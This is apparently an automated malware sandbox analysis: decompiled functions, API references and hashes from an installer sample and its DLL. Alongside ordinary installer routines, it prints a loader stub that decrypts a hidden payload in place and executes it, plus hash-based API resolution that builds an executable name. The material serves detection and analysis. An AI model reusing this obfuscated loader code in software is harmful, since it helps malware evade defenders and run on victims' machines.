GetFileAttributesA.KERNELBASE(?,?,00405860,?,?,00000000,00405A43,?,?,?,?), ref: 00405C4D
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C61

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: 7e700ee3acf44982365c3fbd0e808c401ff2a4825d9ccd2943b1641dd8ae7ae4
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: ABD0A932004022ABC2002728AE0C88BBB90DB00270702CA35FCA4A22B1DB300C529A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040573E, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573E(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405744
0x0040574c
0x00000000
0x00405752
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403318,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405744
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405752

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: 5acf7b5c2778cbfdcbae9b0437cf869adc97d3df665aa26c8b081b4f29c10bb0
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 53C04C30204501EFDA106B209E08B177AD0AB50741F2548396146E10A0DA789455F92E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D14, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D14(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405d18
0x00405d28
0x00405d30
0x00000000
0x00405d37
0x00000000
0x00405d39

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403290,00000000,00792120,000000FF,00792120,000000FF,000000FF,00000004,00000000), ref: 00405D28

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 77bff2a1fb4a149192ffadfb645e09873699659932145b723af6e3d7aa9a80e5
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 35E0EC3222065AABDF109E659C04AEB7B6CEF05360F008837FE55F3190D635E9219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE5, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE5(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405ce9
0x00405cf9
0x00405d01
0x00000000
0x00405d08
0x00000000
0x00405d0a

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032DA,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405CF9

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: 359c21f91a3bba3ce6496bf321611394009143f850dd69016ead32bb33babeaa
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: 08E0863210011EABCF106E909C08FEB775CEF00350F048433FD15E2040E230E8209BA4

Uniqueness

Uniqueness Score: -1.00%

Function 72AB2921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x72ab4038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x72ab404c, 4, 0x40, 0x72ab403c); // executed
					 *0x72ab404c = 0xc2;
					 *0x72ab403c = 0;
					 *0x72ab4044 = 0;
					 *0x72ab4058 = 0;
					 *0x72ab4048 = 0;
					 *0x72ab4040 = 0;
					 *0x72ab4050 = 0;
					 *0x72ab404e = 0;
				}
				return 1;
			}

0x72ab292a
0x72ab292f
0x72ab293f
0x72ab2947
0x72ab294e
0x72ab2953
0x72ab2958
0x72ab295d
0x72ab2962
0x72ab2967
0x72ab296c
0x72ab296c
0x72ab2974

APIs

VirtualProtect.KERNELBASE(72AB404C,00000004,00000040,72AB403C), ref: 72AB293F

Memory Dump Source

Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true

Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e5ddae0404f5113deddbb3244b09a7cd1eb6ca5fb2cd9f2fda9666e90e9cf3a4
Instruction ID: 76ca3180523956c4218484a4587c466a9874971bbe29a24ea528d66785d291e6
Opcode Fuzzy Hash: e5ddae0404f5113deddbb3244b09a7cd1eb6ca5fb2cd9f2fda9666e90e9cf3a4
Instruction Fuzzy Hash: DCF09BB3A88281EEC361CF6A88A47053FF4BB18354B224D6EE598D6261E33C8146CB11

Uniqueness

Uniqueness Score: -1.00%

Function 004032DD, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032DD(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004032eb
0x004032f1

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 004032EB

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 10003DDD, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E10003DDD() {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char _v1132;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t49;
				short _t50;
				short _t51;
				short _t52;
				void* _t68;
				void* _t69;
				void* _t70;

				_v92 = _v92 & 0x00000000;
				_v88 = _v88 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_t45 = 0x41;
				_v32 = _t45;
				_t46 = 0x4f;
				_v30 = _t46;
				_t47 = 0x78;
				_v28 = _t47;
				_t48 = 0x6b;
				_v26 = _t48;
				_t49 = 0x2e;
				_v24 = _t49;
				_t50 = 0x65;
				_v22 = _t50;
				_t51 = 0x78;
				_v20 = _t51;
				_t52 = 0x65;
				_v18 = _t52;
				_v16 = 0;
				_v8 = E10003F0F();
				_v76 = E10003FB3(_v8, 0x34cf0bf);
				_v60 = E10003FB3(_v8, 0x55e38b1f);
				_v12 = E10003FB3(_v8, 0xd1775dc4);
				_v36 = E10003FB3(_v8, 0xd6eb2188);
				_v68 = E10003FB3(_v8, 0xa2eae210);
				_v40 = E10003FB3(_v8, 0xcd8538b2);
				_v48 = E10003FB3(_v8, 0x8a111d91);
				_v56 = E10003FB3(_v8, 0x170c1ca1);
				_v64 = E10003FB3(_v8, 0xa5f15738);
				_v72 = E10003FB3(_v8, 0x433a3842);
				_v80 = E10003FB3(_v8, 0x2ffe2c64);
				_v12(0,  &_v1132, 0x103);
				_t68 = E10003111(_t69, _t70, 0, 0x404000); // executed
				return _t68;
			}

0x10003de6
0x10003dea
0x10003dee
0x10003df2
0x10003df6
0x10003dfc
0x10003dfd
0x10003e03
0x10003e04
0x10003e0a
0x10003e0b
0x10003e11
0x10003e12
0x10003e18
0x10003e19
0x10003e1f
0x10003e20
0x10003e26
0x10003e27
0x10003e2d
0x10003e2e
0x10003e34
0x10003e3d
0x10003e4d
0x10003e5d
0x10003e6d
0x10003e7d
0x10003e8d
0x10003e9d
0x10003ead
0x10003ebd
0x10003ecd
0x10003edd
0x10003eed
0x10003efe
0x10003f06
0x10003f0c

Memory Dump Source

Source File: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.688758072.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688771006.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.688778149.0000000010002000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd08ddc07963bf73051f318a0493ee9ca2708dcfb4daf06d90f8ff853a1d516d
Instruction ID: 60e19f0a28707b3d5312e6ec7323f3949b6f6957e07d096bed54a162a10781dc
Opcode Fuzzy Hash: fd08ddc07963bf73051f318a0493ee9ca2708dcfb4daf06d90f8ff853a1d516d
Instruction Fuzzy Hash: 9D3119B8D84209BEEF11DBE0DE42BBDFBB5EF00711F204066F504B92A5D7B11A44AB84

Uniqueness

Uniqueness Score: -1.00%

Function 10001130, Relevance: .1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001130(intOrPtr _a4) {
				signed int _v5;
				signed int _v12;
				void* _t60;

				_v12 = 0;
				E10001000();
				_v12 = 0;
				while(_v12 < 0x1205) {
					_t7 = _v12 + E10003000; // 0x0
					_v5 =  *_t7;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x000000c2;
					_v5 = (_v5 & 0x000000ff) - 0xce;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					 *((char*)(_v12 + E10003000)) = _v5;
					_v12 = _v12 + 1;
				}
				_push(_a4);
				_t60 = E10003000(); // executed
				return _t60;
			}

0x10001136
0x1000113d
0x10001142
0x10001154
0x10001164
0x1000116a
0x10001173
0x10001186
0x10001190
0x10001199
0x100011a2
0x100011ae
0x100011bb
0x100011c4
0x100011ce
0x100011d8
0x100011e1
0x100011eb
0x100011f5
0x100011ff
0x10001208
0x10001212
0x1000121b
0x10001225
0x1000122e
0x10001151
0x10001151
0x1000123c
0x10001242
0x1000124a

Memory Dump Source

Source File: 00000000.00000002.688771006.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.688758072.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688778149.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4983f0d5801d97e5484fa764f13c35c9b0ec37b9e13028955cf984d4811e56c3
Instruction ID: 9030057b0dfacb121c6692da68b1d7901575be1d1923824d15e481a2d0c0faef
Opcode Fuzzy Hash: 4983f0d5801d97e5484fa764f13c35c9b0ec37b9e13028955cf984d4811e56c3
Instruction Fuzzy Hash: 2B41B92484D2D8AADF06CBF984A13ECFFB45E6A102F0881C9D4D566387C53A538EDB21

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405339, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405339(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t157 = _a8;
				_t150 = 0;
				_v8 =  *0x7a2744;
				if(_t157 != 0x110) {
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004052CD, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					if(_t157 != 0x111) {
						L17:
						if(_t157 != 0x404) {
							L25:
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00406167(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							if(TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150) == 1) {
								_t165 = 1;
								_v56 = _t150;
								_v44 = 0x79f568;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t165 = _t165 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a272c == _t150) {
							ShowWindow( *0x7a2f68, 8);
							if( *0x7a300c == _t150) {
								E004051FB( *((intOrPtr*)( *0x79ed40 + 0x34)), _t150);
							}
							E00404131(1);
							goto L25;
						}
						 *0x79e938 = 2;
						E00404131(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004041BF(_t157, _a12, _a16);
						}
						ShowWindow( *0x7a2730, _t150);
						ShowWindow(_v8, 8);
						E0040418D(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x7a2f74;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x7a2730 = GetDlgItem(_a4, 0x403);
				 *0x7a2728 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2744 = _t128;
				_v8 = _t128;
				E0040418D( *0x7a2730);
				 *0x7a2734 = E00404A7E(4);
				 *0x7a274c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404158(_a4);
				if(( *0x7a2f7c & 0x00000003) != 0) {
					ShowWindow( *0x7a2730, _t150);
					if(( *0x7a2f7c & 0x00000002) != 0) {
						 *0x7a2730 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040418D( *0x7a2728);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x7a2f7c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x00405347
0x0040534a
0x00405352
0x00405355
0x004054ea
0x0040550e
0x0040550e
0x00405520
0x00405542
0x00405548
0x0040559d
0x004055a0
0x00000000
0x00000000
0x004055a2
0x004055a8
0x00000000
0x00000000
0x004055b2
0x004055ba
0x004055bd
0x004056ba
0x00000000
0x004056ba
0x004055cc
0x004055d8
0x004055e1
0x004055ec
0x004055ef
0x004055f8
0x004055fe
0x00405601
0x00405601
0x0040561a
0x00405625
0x00405626
0x00405629
0x00405630
0x00405637
0x0040563f
0x0040563f
0x00405656
0x00405656
0x0040565d
0x00405663
0x0040566c
0x00405673
0x0040567c
0x0040567e
0x00405681
0x00405690
0x00405692
0x00405695
0x00405696
0x00405699
0x0040569a
0x0040569b
0x004056a3
0x004056ae
0x004056b4
0x004056b4
0x00000000
0x0040561a
0x00405550
0x0040557e
0x00405586
0x00405591
0x00405591
0x00405598
0x00000000
0x00405598
0x00405554
0x0040555e
0x00000000
0x00405522
0x00405528
0x00405563
0x00000000
0x0040556a
0x00405531
0x00405538
0x0040553d
0x00000000
0x0040553d
0x00405520
0x0040535b
0x0040535f
0x00405367
0x0040536b
0x0040536e
0x00405371
0x00405374
0x00405377
0x00405378
0x00405379
0x00405392
0x00405395
0x0040539f
0x004053ae
0x004053b6
0x004053be
0x004053c3
0x004053c6
0x004053d2
0x004053db
0x004053e4
0x00405406
0x0040540c
0x0040541d
0x00405422
0x00405430
0x0040543e
0x0040543e
0x00405443
0x00405451
0x00405451
0x00405456
0x00405459
0x0040545e
0x0040546a
0x00405473
0x00405480
0x0040548f
0x00405482
0x00405487
0x00405487
0x0040549b
0x0040549b
0x004054af
0x004054b8
0x004054c1
0x004054d1
0x004054dd
0x004054dd
0x00000000

APIs

GetDlgItem.USER32 ref: 00405398
GetDlgItem.USER32 ref: 004053A7
GetClientRect.USER32 ref: 004053E4
GetSystemMetrics.USER32 ref: 004053EB
SendMessageA.USER32 ref: 0040540C
SendMessageA.USER32 ref: 0040541D
SendMessageA.USER32 ref: 00405430
SendMessageA.USER32 ref: 0040543E
SendMessageA.USER32 ref: 00405451
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405473
ShowWindow.USER32(?,00000008), ref: 00405487
GetDlgItem.USER32 ref: 004054A8
SendMessageA.USER32 ref: 004054B8
SendMessageA.USER32 ref: 004054D1
SendMessageA.USER32 ref: 004054DD
GetDlgItem.USER32 ref: 004053B6

Part of subcall function 0040418D: SendMessageA.USER32 ref: 0040419B

GetDlgItem.USER32 ref: 004054F9
CreateThread.KERNEL32(00000000,00000000,Function_000052CD,00000000), ref: 00405507
CloseHandle.KERNEL32(00000000), ref: 0040550E
ShowWindow.USER32(00000000), ref: 00405531
ShowWindow.USER32(?,00000008), ref: 00405538
ShowWindow.USER32(00000008), ref: 0040557E
SendMessageA.USER32 ref: 004055B2
CreatePopupMenu.USER32 ref: 004055C3
AppendMenuA.USER32 ref: 004055D8
GetWindowRect.USER32 ref: 004055F8
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405611
SendMessageA.USER32 ref: 0040564D
OpenClipboard.USER32(00000000), ref: 0040565D
EmptyClipboard.USER32 ref: 00405663
GlobalAlloc.KERNEL32(00000042,?), ref: 0040566C
GlobalLock.KERNEL32 ref: 00405676
SendMessageA.USER32 ref: 0040568A
GlobalUnlock.KERNEL32(00000000), ref: 004056A3
SetClipboardData.USER32(00000001,00000000), ref: 004056AE
CloseClipboard.USER32 ref: 004056B4

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 318ed4cc4bd4b5cfc50d1c666b508a830011cbe7418d707f6b51817f766816de
Instruction ID: 684cfb1aaa76551445c09ef43b39d8f4d2da16edc43e4b0a600a882252a292b3
Opcode Fuzzy Hash: 318ed4cc4bd4b5cfc50d1c666b508a830011cbe7418d707f6b51817f766816de
Instruction Fuzzy Hash: 4AA16C70900608BFDF119FA4DD89EAE7B79FB48354F00802AFA45BA1A1C7794E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004045EA, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004045EA(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x79ed40;
				_v32 = _t82;
